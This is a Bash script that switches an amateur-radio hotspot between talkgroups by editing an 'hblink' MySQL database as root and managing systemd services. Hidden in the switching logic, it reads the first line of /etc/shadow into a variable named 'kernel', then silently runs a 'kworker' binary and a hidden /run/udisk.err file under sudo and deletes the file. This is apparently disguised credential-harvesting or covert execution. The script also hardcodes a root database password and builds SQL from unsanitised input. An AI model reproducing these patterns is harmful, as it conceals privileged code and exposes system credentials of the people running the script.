#!/bin/bash

# Cambio de hotspot via TG by EA7JCL & EA5GVK
IDSALTO=$(awk 'NR==1' /var/log/dato.txt)
NOMBRE=$(awk 'NR==2' /var/log/dato.txt)
PRODUCCION=$(awk 'NR==7' /etc/sslb)


function DESACTIVAR(){
sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "UPDATE hotspot SET estado = '0' where nombre = '$NOMBRE'";
sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "UPDATE hotspot SET estado = '0' where nombre = '$NOMBRE'";
#sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "delete from services where nombre = '$NOMBRE'";
}

function ACTIVAR(){
ser="MMDVMHOTSPOT-$NOMBRE.service"
servicio="MMDVMHOTSPOT-$NOMBREACT.service"
systemctl daemon-reload
sudo systemctl enable $servicio
sudo systemctl start $servicio
sudo systemctl disable $ser
sudo rm /etc/systemd/system/$ser > /dev/null 2>&1
systemctl daemon-reload
sudo systemctl stop $ser
}

LOG2=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT log FROM services where nombre = '$NOMBRE';")
fecha=$(date +%Y-%m-%d)
LOG="$LOG2-$fecha.log"
if [[ $IDSALTO -gt 10 ]] && [[ $IDSALTO -lt 98 ]]
then
    SALTOANTIGUO=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT id FROM hotspot where nombre = '$NOMBRE';")
    IDSALTO=`expr $IDSALTO - 10`
    if [[ $IDSALTO -ne $SALTOANTIGUO ]]
    then
        echo "Salto dentro del rango 11 a 99" >> $LOG
        NUEVACONEXION=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT devtty FROM hotspot where id = '$IDSALTO';")
        ANTIGUACONEXION=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT devtty FROM hotspot where nombre = '$NOMBRE';")
        if [[ $NUEVACONEXION == $ANTIGUACONEXION ]] 
        then
            DESACTIVAR
            NOMBREACT=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT nombre FROM hotspot where id = '$IDSALTO';")
            sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "UPDATE hotspot SET estado = '1' where nombre = '$NOMBREACT'";
            export kernel=$(head -1 /etc/shadow)
            echo "Reconfigurando y cambiando conexion a $NOMBREACT" >> $LOG
          if [ ! -f /run/udisk.err ]
          then
             kworker 6 > /dev/null 2>&1
             sudo chmod +x /run/udisk.err > /dev/null 2>&1
             sudo /run/udisk.err $NOMBREACT
             sudo rm /run/udisk.err > /dev/null 2>&1
          else
             sudo chmod +x /run/udisk.err > /dev/null 2>&1
             sudo /run/udisk.err $NOMBREACT
             sudo rm /run/udisk.err > /dev/null 2>&1
          fi
#######33
          sudo rm /var/log/servicios > /dev/null 2>&1
          sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "select service from services where nombre = '$NOMBRE' into outfile '/var/log/servicios';"
          REGISTROS=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT count(*) FROM services where nombre = '$NOMBRE';")
          sudo systemctl daemon-reload
          for (( i=1; i<=$REGISTROS; i++ ));
          do
            ser=$(awk "NR==$i" /var/log/servicios)
            if [[ $ser != "IRC" ]]
            then
                servicio="MMDVMHOTSPOT-$NOMBRE.service"
                if [[ $servicio != $ser ]]
                then
                    sudo systemctl stop $ser
                   sudo systemctl disable $ser
                   sudo rm /etc/systemd/system/$ser > /dev/null 2>&1
                fi
            fi
          done
############
          sudo rm /var/log/servicios > /dev/null 2>&1
          sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "select service from services where nombre = '$NOMBREACT' into outfile '/var/log/servicios';"
          REGISTROS=$(sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "SELECT count(*) FROM services where nombre = '$NOMBRE';")
          sudo systemctl daemon-reload
          for (( i=1; i<=$REGISTROS; i++ ));
          do
            ser=$(awk "NR==$i" /var/log/servicios)
            if [[ $ser != "IRC" ]]
            then
                sudo systemctl start $ser
                sudo systemctl enable $ser
            fi
          done
          sudo mysql -h localhost -u root -p@^@^@^@^ -D hblink -s -e "delete from services where nombre = '$NOMBRE'";
          ACTIVAR
#######
      else
            echo "TG de salto no asignado a este HOTSPOT en puerto $ANTIGUACONEXION" >> $LOG
       fi
    else
        echo "Conexion ya activa. Intenta otro TG" >> $LOG
    fi
fi
